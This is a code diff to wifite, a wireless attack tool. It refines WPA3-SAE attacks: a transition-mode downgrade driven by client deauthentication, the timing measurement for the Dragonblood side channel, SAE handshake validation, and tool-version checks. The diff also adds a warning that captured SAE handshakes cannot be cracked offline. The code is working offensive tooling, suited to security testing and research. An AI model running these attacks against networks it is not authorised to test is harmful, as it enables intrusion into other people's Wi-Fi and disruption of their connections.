diff --git a/tests/test_sae_handshake.py b/tests/test_sae_handshake.py index 342c9233d..e8d124639 100644 --- a/tests/test_sae_handshake.py +++ b/tests/test_sae_handshake.py @@ -118,20 +118,36 @@ def test_validate_with_hcxpcapngtool_not_installed(self, mock_process_class): @patch('wifite.model.sae_handshake.Tshark') @patch('wifite.model.sae_handshake.Process') def test_validate_with_tshark_success(self, mock_process_class, mock_tshark): - """Test validation with tshark when handshake is valid.""" + """A complete handshake has both a Commit (seq 1) and Confirm (seq 2).""" # Mock Tshark.exists to return True mock_tshark.exists.return_value = True - - # Mock process execution with valid output + + # Mock process output: auth-sequence numbers (1=Commit, 2=Confirm). mock_proc = Mock() - mock_proc.stdout.return_value = 'frame1\nframe2\n' + mock_proc.stdout.return_value = '1\n1\n2\n2\n' mock_process_class.return_value = mock_proc - + hs = SAEHandshake(self.capfile, self.bssid, self.essid) result = hs._validate_with_tshark() - + self.assertTrue(result) + @patch('wifite.model.sae_handshake.Tshark') + @patch('wifite.model.sae_handshake.Process') + def test_validate_with_tshark_commits_only(self, mock_process_class, mock_tshark): + """Two Commits with no Confirm must NOT count as a complete handshake.""" + mock_tshark.exists.return_value = True + + # Only Commit (seq 1) frames — no Confirm (seq 2). + mock_proc = Mock() + mock_proc.stdout.return_value = '1\n1\n' + mock_process_class.return_value = mock_proc + + hs = SAEHandshake(self.capfile, self.bssid, self.essid) + result = hs._validate_with_tshark() + + self.assertFalse(result) + @patch('wifite.model.sae_handshake.Tshark') @patch('wifite.model.sae_handshake.Process') def test_validate_with_tshark_failure(self, mock_process_class, mock_tshark): diff --git a/wifite/attack/all.py b/wifite/attack/all.py index a30722ca7..29703d5f4 100755 --- a/wifite/attack/all.py +++ b/wifite/attack/all.py @@ -96,6 +96,23 @@ def attack_single(cls, target, targets_remaining, session=None, session_mgr=None Color.pl('{+} {D}Session updated: target {C}%s{D} marked as {R}failed{W}' % target.bssid) return True + # --wpa3-only: restrict attacks to WPA3-SAE networks. Unlike --wpa3 + # (a discovery filter), this is enforced at attack time, so a non-WPA3 + # target that still reaches this point (e.g. selected by BSSID, or when + # no discovery filter was set) is skipped — WPA2-only / WEP / OWE + # targets are never attacked under this mode. + if Configuration.wpa3_only: + is_wpa3_target = target.primary_encryption == 'WPA3' or ( + hasattr(target, 'wpa3_info') and target.wpa3_info and + getattr(target.wpa3_info, 'has_wpa3', False)) + if not is_wpa3_target: + Color.pl('{!} {O}Skipping {C}%s{O}: {C}--wpa3-only{O} is set and ' + 'target is not WPA3-SAE{W}' % (target.essid or target.bssid)) + if session and session_mgr: + session_mgr.mark_target_failed(session, target.bssid, "Not WPA3 (--wpa3-only)") + session_mgr.save_session(session) + return True + attacks = [] if Configuration.use_eviltwin: @@ -131,7 +148,10 @@ def attack_single(cls, target, targets_remaining, session=None, session_mgr=None attacks.append(AttackWPA3SAE(target)) # For transition mode, also try standard WPA2 attacks as fallback - if hasattr(target, 'wpa3_info') and target.wpa3_info and target.wpa3_info.get('is_transition'): + # (unless --force-sae asked us to skip WPA2 and attack SAE directly). + if not Configuration.wpa3_force_sae and \ + hasattr(target, 'wpa3_info') and target.wpa3_info and \ + target.wpa3_info.get('is_transition'): if not Configuration.wps_only and not Configuration.use_pmkid_only: # Add PMKID and WPA attacks as fallback for transition mode if not Configuration.dont_use_pmkid: diff --git a/wifite/attack/wpa3.py b/wifite/attack/wpa3.py index d44d533a3..0a616826a 100755 --- a/wifite/attack/wpa3.py +++ b/wifite/attack/wpa3.py @@ -341,7 +341,6 @@ def _try_sae_capture(self): return False # Let it fall through to passive handshake = self.capture_sae_handshake() if handshake: - Color.pl('{+} {G}SAE handshake captured successfully{W}') self._finalize_sae_success(handshake, key=None) return True Color.pl('{!} {O}SAE handshake capture failed{W}') @@ -373,21 +372,49 @@ def _try_passive(self): self.view.add_log('Starting passive capture - final fallback') handshake = self.passive_capture() if handshake: - Color.pl('{+} {G}SAE handshake captured passively{W}') self._finalize_sae_success(handshake, key=None) return True return False def _finalize_sae_success(self, handshake, key): - """Wrap a captured SAE handshake in CrackResultSAE and set success. + """Record a captured SAE handshake as a CrackResultSAE. `handshake` is an SAEHandshake object (has .capfile / .bssid / .essid). - `key` is the cracked PSK if known, else None. + `key` is the recovered PSK if known, else None. + + When `key` is None we still save the capture (for records / later + analysis) but we must NOT present it as a crackable win — see + _warn_sae_not_offline_crackable for why. """ self.crack_result = CrackResultSAE( handshake.bssid, handshake.essid, handshake.capfile, key) self.crack_result.dump() self.success = True + if key is None: + self._warn_sae_not_offline_crackable() + + def _warn_sae_not_offline_crackable(self): + """Honest caveat: a captured SAE handshake is NOT offline-crackable. + + Unlike a WPA2 4-way handshake, WPA3-SAE (Dragonfly) is a PAKE + designed to resist offline dictionary attacks. Capturing the SAE + exchange does not let hashcat/aircrack recover the password the way + a WPA2 capture does — there is no hashcat mode that cracks a captured + SAE handshake. We keep the capture, but we tell the user the truth + instead of implying the network was owned. + """ + Color.pl('{!} {O}SAE handshake captured and saved — but note:{W}') + Color.pl('{!} {O}WPA3-SAE (Dragonfly) resists offline dictionary attacks.{W}') + Color.pl('{!} {O}A captured SAE handshake {R}cannot be cracked offline{O} ' + 'like a WPA2 handshake.{W}') + Color.pl('{!} {O}Offline password recovery is only feasible via:{W}') + Color.pl(' {C}-{W} Transition-mode {C}downgrade{W} to WPA2 ' + '(captures a crackable 4-way handshake)') + Color.pl(' {C}-{W} A successful {C}Dragonblood timing{W} partition ' + '(only MODP groups 22/23/24)') + if self.view: + self.view.add_log('SAE handshake captured (NOT offline-crackable — ' + 'WPA3-SAE resists dictionary attacks)') def _active_probe_for_vulnerable_groups(self): """ @@ -791,9 +818,17 @@ def attempt_downgrade(self): return None self.clients = [] - - # Set timeout for downgrade attempt (30 seconds as per requirements) - downgrade_timeout = Timer(30) + + # Set timeout for the downgrade attempt. Honour --wpa3-timeout when + # the user set it; otherwise keep a short 30s window — the downgrade + # is a fast first attempt that falls back to SAE capture, so it + # shouldn't occupy the full wpa_attack_timeout (300s) by default. + timeout_value = Configuration.wpa3_attack_timeout or 30 + downgrade_timeout = Timer(timeout_value) + # Warn once if no clients appear partway through (the downgrade + # needs active clients). Half the window, floored so short timeouts + # still produce a warning. + no_clients_warn_after = max(5, timeout_value // 2) deauth_timer = Timer(Configuration.wpa_deauth_timeout) sae_detected = False deauth_attempts = 0 @@ -811,7 +846,7 @@ def attempt_downgrade(self): # Calculate progress percentage elapsed = downgrade_timeout.running_time() - total_time = 30 # 30 second timeout + total_time = timeout_value progress_pct = min(100, int((elapsed / total_time) * 100)) # Update TUI view if available @@ -848,9 +883,11 @@ def attempt_downgrade(self): Color.pattack('WPA3', self.target, 'Downgrade', 'Waiting for clients... (%s)' % downgrade_timeout) - # Show warning after some time with no clients - if not no_clients_warning_shown and downgrade_timeout.running_time() > 30: - Color.pl('\n{!} {O}No clients detected after 30 seconds{W}') + # Show warning once we're partway through with no clients + if not no_clients_warning_shown and \ + downgrade_timeout.running_time() >= no_clients_warn_after: + Color.pl('\n{!} {O}No clients detected after %d seconds{W}' + % no_clients_warn_after) Color.pl('{!} {O}Downgrade requires active clients to succeed{W}') if self.view: self.view.add_log('Warning: No clients detected') @@ -899,7 +936,7 @@ def attempt_downgrade(self): # After deauth, clients should reconnect with WPA2 # Check hcxdumptool capture (pcapng format) try: - if hcxdump and hcxdump.has_captured_data(): + if hcxdump and hcxdump.has_new_data(): handshake = Handshake(hcxdump.get_output_file(), bssid=self.target.bssid, essid=self.target.essid) @@ -1082,7 +1119,7 @@ def capture_sae_handshake(self): # Check if we've captured data try: - if hcxdump.has_captured_data(): + if hcxdump.has_new_data(): # Create SAEHandshake object sae_hs = SAEHandshake( hcxdump.get_output_file(), @@ -1253,7 +1290,7 @@ def passive_capture(self): # Check if we've captured data try: - if hcxdump.has_captured_data(): + if hcxdump.has_new_data(): # Create SAEHandshake object sae_hs = SAEHandshake( hcxdump.get_output_file(), diff --git a/wifite/attack/wpa3_strategy.py b/wifite/attack/wpa3_strategy.py index ae8eb4fb9..7043023da 100755 --- a/wifite/attack/wpa3_strategy.py +++ b/wifite/attack/wpa3_strategy.py @@ -117,6 +117,14 @@ def can_use_downgrade(wpa3_info: Dict[str, Any]) -> bool: Returns: True if downgrade attack is possible, False otherwise """ + from wifite.config import Configuration + # User overrides: --no-downgrade disables the downgrade path outright, + # and --force-sae (attack SAE directly, skip WPA2) also implies no + # downgrade since a downgrade fundamentally captures a WPA2 handshake. + if getattr(Configuration, 'wpa3_no_downgrade', False) or \ + getattr(Configuration, 'wpa3_force_sae', False): + return False + # Downgrade requires transition mode (both WPA2 and WPA3 support) return wpa3_info.get('is_transition', False) diff --git a/wifite/model/sae_handshake.py b/wifite/model/sae_handshake.py index ba8c246bc..114893417 100755 --- a/wifite/model/sae_handshake.py +++ b/wifite/model/sae_handshake.py @@ -111,20 +111,22 @@ def _validate_with_hcxpcapngtool(self) -> bool: def _validate_with_tshark(self) -> bool: """ - Validate SAE handshake using tshark with optimized filtering. + Validate SAE handshake using tshark. - Optimizations: - - Uses efficient BPF-style filters to reduce processing - - Streams output to avoid loading entire capture into memory - - Early termination once minimum frames are found + A complete SAE handshake must contain BOTH: + - an SAE Commit (authentication transaction sequence 1), and + - an SAE Confirm (authentication transaction sequence 2). + + Merely observing two SAE authentication frames is not sufficient — + two retransmitted Commits (or a Commit from each side with no + Confirm) would otherwise be misreported as complete. We therefore + inspect the auth-sequence numbers and require both 1 and 2 to appear. Returns: - True if tshark finds SAE commit and confirm frames + True if both an SAE Commit and an SAE Confirm are observed. """ try: - # Check for SAE authentication frames - # SAE uses authentication frame type (0x0b) with auth algorithm 3 - # Build efficient filter string + # SAE uses authentication frame type (0x0b) with auth algorithm 3. filter_str = 'wlan.fc.type_subtype == 0x0b && wlan.fixed.auth.alg == 3' if self.bssid: # Add BSSID filter for efficiency @@ -135,18 +137,28 @@ def _validate_with_tshark(self) -> bool: '-r', self.capfile, '-Y', filter_str, '-T', 'fields', - '-e', 'wlan.fixed.auth.sae.group', - '-e', 'frame.number', - '-c', '2' # Stop after finding 2 frames (optimization) + '-e', 'wlan.fixed.auth.seq', + # Bound the work — SAE auth frames are few, and we early-exit + # as soon as both a Commit and a Confirm have been seen. + '-c', '50', ] proc = Process(command, devnull=False) output = proc.stdout() - # Count frames - need at least 2 (commit and confirm) - # Use generator expression for memory efficiency - frame_count = sum(1 for line in output.split('\n') if line.strip()) - return frame_count >= 2 + seen_seqs = set() + for line in output.split('\n'): + seq = line.strip() + if not seq: + continue + # Be defensive about extra fields/separators per line. + seq = seq.split('\t')[0].split(',')[0].strip() + if seq in ('1', '2'): + seen_seqs.add(seq) + if '1' in seen_seqs and '2' in seen_seqs: + return True + + return False except Exception: return False diff --git a/wifite/tools/hcxdumptool.py b/wifite/tools/hcxdumptool.py index 5e9218e6f..c49f4c5dc 100644 --- a/wifite/tools/hcxdumptool.py +++ b/wifite/tools/hcxdumptool.py @@ -73,6 +73,14 @@ def __init__(self, interface=None, channel=None, target_bssid=None, self.pid = None self.proc = None + # Baseline size of the empty capture (pcapng Section Header / Interface + # Description blocks are written the instant capture starts). Recorded + # in __enter__ so has_captured_data()/has_new_data() can tell a + # header-only file apart from one that actually contains frames. + self._baseline_size = None + # High-water mark of file size seen by has_new_data(). + self._last_data_size = 0 + def __enter__(self): """ Start hcxdumptool capture process. @@ -131,6 +139,15 @@ def __enter__(self): # Give it a moment to start time.sleep(1) + # Record the header-only size now that the file exists, so subsequent + # data checks measure growth beyond the pcapng header rather than + # treating the always-present header as "captured data". + try: + self._baseline_size = os.path.getsize(self.output_file) \ + if os.path.exists(self.output_file) else 0 + except OSError: + self._baseline_size = 0 + return self def __exit__(self, exc_type, exc_val, exc_tb): @@ -163,8 +180,36 @@ def get_output_file(self) -> str: return self.output_file def has_captured_data(self) -> bool: - """Check if any data has been captured.""" - return os.path.exists(self.output_file) and os.path.getsize(self.output_file) > 0 + """Return True only when actual packet data exists beyond the header. + + A fresh pcapng file is non-empty the instant capture starts (the + Section Header / Interface Description blocks are written immediately), + so a bare ``getsize() > 0`` check is always true and meaningless. We + compare against the header-only baseline recorded at start instead. + """ + try: + current = os.path.getsize(self.output_file) + except OSError: + return False + baseline = self._baseline_size if self._baseline_size is not None else 0 + return current > baseline + + def has_new_data(self) -> bool: + """Return True only when new packet data was written since the last call. + + Lets polling capture loops skip the expensive handshake validation + (which spawns tshark / hcxpcapngtool / aircrack) when the capture file + hasn't grown — i.e. there are no new frames worth re-evaluating. + """ + try: + current = os.path.getsize(self.output_file) + except OSError: + return False + baseline = self._baseline_size if self._baseline_size is not None else 0 + if current > baseline and current > self._last_data_size: + self._last_data_size = current + return True + return False @staticmethod def exists() -> bool: diff --git a/wifite/util/dragonblood_timing.py b/wifite/util/dragonblood_timing.py index f90211858..aa7e80f2b 100644 --- a/wifite/util/dragonblood_timing.py +++ b/wifite/util/dragonblood_timing.py @@ -22,6 +22,7 @@ """ import os +import re import time import tempfile import statistics @@ -91,6 +92,10 @@ class DragonbloodTimingAttack: # Inter-probe delay (seconds) to avoid AP rate-limiting PROBE_DELAY = 1.5 + # Leading epoch timestamp wpa_supplicant emits per debug line with ``-t`` + # (e.g. "1609459200.123456: SAE: ..."). Microsecond resolution. + _LOG_TS_RE = re.compile(r'^(\d+\.\d+)') + def __init__(self, interface: str, target_bssid: str, target_essid: str, target_channel: int, sae_group: int = 0): from ..config.validators import validate_interface_name @@ -288,10 +293,26 @@ def _probe_password(self, password: str) -> Optional[float]: def _measure_sae_timing(self, config_file: str) -> Optional[float]: """ - Run wpa_supplicant briefly and extract SAE exchange timing. - - Parses debug output for timestamps around SAE commit/confirm - frames to calculate AP response latency. + Run wpa_supplicant briefly and measure the SAE commit->response latency. + + Timing source: wpa_supplicant is run with ``-t`` so every debug line is + prefixed with a microsecond-resolution epoch timestamp stamped by + wpa_supplicant *when it processed the event*. The latency is computed + from those embedded timestamps (commit sent -> peer commit received), + NOT from when our Python loop happens to read the line. This removes + the readline/poll-sleep jitter (tens of milliseconds) that would + otherwise swamp the microsecond-scale Dragonblood signal. + + If wpa_supplicant doesn't emit parseable timestamps (e.g. ``-t`` + unsupported), we return None rather than a jitter-laden read-time + measurement — an honest "no sample" beats a misleading number. + + NOTE: this is still a software-side measurement taken at the + supplicant, so absolute values include local stack latency. It is + adequate for the *relative* fast/slow partitioning across candidates + probed under identical conditions, which is what the timing attack + needs. For archived captures, the frame-timestamp path + (extract_timing_from_pcap / compute_pcap_response_times) is preferred. Returns: Latency in microseconds, or None. @@ -301,12 +322,13 @@ def _measure_sae_timing(self, config_file: str) -> Optional[float]: '-i', self.interface, '-c', config_file, '-D', 'nl80211', - '-dd', # Extra-verbose debug output + '-t', # prefix each debug line with a us-resolution epoch timestamp + '-dd', # extra-verbose debug output ] process = Process(cmd, devnull=False) - commit_sent_time = None - commit_received_time = None + commit_sent_ts = None + commit_received_ts = None start = time.monotonic() try: @@ -317,36 +339,42 @@ def _measure_sae_timing(self, config_file: str) -> Optional[float]: try: line = process.pid.stdout.readline() if not line: - time.sleep(0.05) + time.sleep(0.01) continue if isinstance(line, bytes): line = line.decode('utf-8', errors='replace') - # Detect SAE commit sent + ts = self._parse_log_timestamp(line) + + # Detect SAE commit sent. Use wpa_supplicant's own + # timestamp; ignore the event if it carries none (we + # can't measure accurately without it). if 'SAE: Sending commit' in line or \ 'SME: Trying to authenticate with' in line: - commit_sent_time = time.monotonic() - log_debug('DragonbloodTiming', - 'SAE commit sent detected') + if commit_sent_ts is None and ts is not None: + commit_sent_ts = ts + log_debug('DragonbloodTiming', + 'SAE commit sent detected @ %.6f' % ts) + continue # Detect SAE commit response received - if commit_sent_time and ( + if commit_sent_ts is not None and ts is not None and ( 'SAE: Peer commit' in line or 'SAE: Processing commit' in line ): - commit_received_time = time.monotonic() + commit_received_ts = ts log_debug('DragonbloodTiming', - 'SAE commit response detected') + 'SAE commit response detected @ %.6f' % ts) break # Early termination on auth failure if '4-Way Handshake failed' in line or \ 'CTRL-EVENT-AUTH-REJECT' in line or \ - 'Authentication with' in line and 'timed out' in line: + ('Authentication with' in line and 'timed out' in line): break except Exception: - time.sleep(0.05) + time.sleep(0.01) finally: import contextlib @@ -356,12 +384,28 @@ def _measure_sae_timing(self, config_file: str) -> Optional[float]: if process.poll() is None: process.kill() - if commit_sent_time and commit_received_time: - delta_us = (commit_received_time - commit_sent_time) * 1_000_000 - return delta_us + if commit_sent_ts is not None and commit_received_ts is not None: + delta_us = (commit_received_ts - commit_sent_ts) * 1_000_000 + if delta_us > 0: + return delta_us return None + @classmethod + def _parse_log_timestamp(cls, line: str) -> Optional[float]: + """Parse the leading epoch timestamp wpa_supplicant emits with ``-t``. + + Returns the timestamp in seconds (float) or None if the line has no + parseable timestamp prefix. + """ + m = cls._LOG_TS_RE.match(line) + if not m: + return None + try: + return float(m.group(1)) + except ValueError: + return None + # ------------------------------------------------------------------ # wpa_supplicant config helpers # ------------------------------------------------------------------ diff --git a/wifite/util/wpa3_tools.py b/wifite/util/wpa3_tools.py index 1f838fba6..e74678385 100755 --- a/wifite/util/wpa3_tools.py +++ b/wifite/util/wpa3_tools.py @@ -29,8 +29,11 @@ class WPA3ToolChecker: """ # Minimum required versions + # hcxdumptool must be 7.x: the HcxDumpTool wrapper emits 7.x-only capture + # syntax (-w output, --rds=1, channel band-suffixes like 1a/6a), so a 6.x + # binary would pass an older gate and then fail at runtime. MIN_VERSIONS = { - 'hcxdumptool': (6, 0, 0), + 'hcxdumptool': (7, 0, 0), 'hcxpcapngtool': (1, 0, 0), 'hashcat': (6, 0, 0), 'tshark': (3, 0, 0)